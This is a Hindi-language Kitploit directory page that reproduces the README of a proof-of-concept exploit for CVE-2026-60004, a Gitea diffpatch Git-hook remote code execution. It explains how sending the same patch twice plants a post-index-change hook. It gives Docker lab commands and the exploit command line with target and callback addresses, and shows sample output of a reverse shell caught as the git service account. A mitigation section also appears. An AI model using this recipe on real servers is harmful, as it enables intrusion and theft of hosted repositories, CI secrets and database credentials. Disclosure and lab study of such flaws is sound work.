Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-60004 — CVE-2026-60004 के लिए स्वचालित proof-of-concept exploit, एक Gitea diffpatch Git hook RCE जो service account के रूप में reverse shell प्राप्त करने के लिए post-index-change hook स्थापित करता है। | Kitploit
उपकरण/GitHubGitHub/yym8538/cve-2026-60004
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubyym8538/cve-2026-60004

CVE-2026-60004

CVE-2026-60004 के लिए स्वचालित proof-of-concept exploit, एक Gitea diffpatch Git hook RCE जो service account के रूप में reverse shell प्राप्त करने के लिए post-index-change hook स्थापित करता है।

11 महीना पहलेअभी तक समीक्षित नहीं
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-60004 Gitea diffpatch RCE

★ CVE-2026-60004 Gitea diffpatch Git Hook RCE PoC ★

https://github.com/user-attachments/assets/403a70f4-4ff4-4ab7-b11c-d73d70adaf0b


अवलोकन

CVE-2026-60004 Gitea में एक रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है। diffpatch API दिए गए पैच को git apply --cached के साथ लागू करता है, जिसे केवल इंडेक्स को छूना चाहिए और कभी भी फ़ाइलों को डिस्क पर नहीं लिखना चाहिए। एक ही पैच को दो बार भेजकर, एक हमलावर एक add/add टकराव को मजबूर करता है जो Git के three-way merge fallback (-3) को ट्रिगर करता है। वह पथ --cached को अनदेखा करता है और फ़ाइल को वर्किंग ट्री में चेकआउट करता है। चूंकि अस्थायी क्लोन bare है, इसका वर्किंग ट्री रूट $GIT_DIR है। एक पैच जो एक निष्पादन योग्य बनाता है, इसलिए एक लाइव Git हुक स्थापित करता है, जिसे Git अगले इंडेक्स अपडेट पर स्वचालित रूप से चलाता है — Gitea सेवा खाते के रूप में कमांड निष्पादित करता है। एंडपॉइंट को रिपॉजिटरी लेखन पहुंच की आवश्यकता होती है, लेकिन पंजीकरण डिफ़ॉल्ट रूप से सक्षम है, इसलिए कोई भी उपयोगकर्ता जो साइन अप कर सकता है और एक रिपॉजिटरी बना सकता है, उस तक पहुंच सकता है।

hooks/post-index-change

प्रभावित संस्करण

श्रेणीसंस्करण
भेद्यGitea 1.17 ≤ संस्करण ≤ 1.27.0
पैच किया गयाGitea 1.27.1 या बाद का

प्रभाव

  • Gitea सेवा खाते (git) के रूप में रिमोट कोड एक्ज़ीक्यूशन
  • सभी होस्ट किए गए रिपॉजिटरी, CI रहस्यों और डेटाबेस क्रेडेंशियल्स तक पहुंच

वातावरण

भेद्य Gitea वातावरण बनाएं और चलाएं। पंजीकरण खुला छोड़ा गया है और सर्वर Git 2.32+ के साथ आता है, जो हमले के आधार पर -3 fallback को सक्षम करता है।

root@kitploit:~
docker build -t cve-2026-60004 .
docker run -d --name cve-2026-60004 -p 3000:3000 cve-2026-60004
पूर्व शर्तइस लैब में स्थिति
Gitea 1.17 – 1.27.01.27.0
सर्वर पर Git 2.32+ (-3 सक्षम करता है)2.54
खुला पंजीकरणसक्षम (डिफ़ॉल्ट)
रिपॉजिटरी लेखन पहुंचस्व-पंजीकृत खाते के माध्यम से

PoC

एक्सप्लॉइट पूरी तरह से gitea_exploit.py द्वारा स्वचालित है। एक खाता दिया गया है जो एक रिपॉजिटरी बना सकता है, यह लक्ष्य रेपो बनाता है, एक ही पैच को बार-बार सबमिट करता है जब तक Git का -3 fallback सक्रिय नहीं हो जाता, और एक अंतर्निहित लिसनर के साथ रिवर्स शेल को पकड़ता है — कोई मैन्युअल सेटअप, पैच क्राफ्टिंग, या blob-hash गणित की आवश्यकता नहीं।

root@kitploit:~
# python3 gitea_exploit.py <target ip:port> <callback ip> [callback port]
python3 gitea_exploit.py 172.17.0.2:3000 172.17.0.3 4444 \
  --user test --pw 11111111 --repo rce

-3 fallback केवल कुछ समय विंडो में सक्रिय होता है, इसलिए स्क्रिप्ट create → send → send को लूप करती है जब तक यह पकड़ नहीं लेती (डिफ़ॉल्ट 25 प्रयास)। जब एक send ब्लॉक होता है, हुक सक्रिय हो गया है और लिसनर आपको git के रूप में एक शेल में डाल देता है:

root@kitploit:~
[*] attempt  3/25 -> send#1 201, send#2 timeout   <- BLOCKED (fired!)
[+] shell from 172.17.0.2:53344 -- type commands, Ctrl-C to quit
uid=1000(git) gid=1000(git) groups=1000(git)

विकल्प:

  • --no-listen — अंतर्निहित लिसनर के बजाय अपने स्वयं के बाहरी nc के साथ शेल को पकड़ें
  • --user / --pw / --repo / --branch — डिफ़ॉल्ट खाते और लक्ष्य रेपो को ओवरराइड करें

शमन

  • Gitea को 1.27.1 या बाद के संस्करण में अपग्रेड करें
  • यदि आवश्यक न हो तो खुला पंजीकरण अक्षम करें (DISABLE_REGISTRATION=true)
  • इंस्टेंस तक पहुंच और रिपॉजिटरी बनाने वालों को प्रतिबंधित करें

विश्लेषण

  • KR: जल्द आ रहा है!
  • EN:
टूल डाउनलोड करें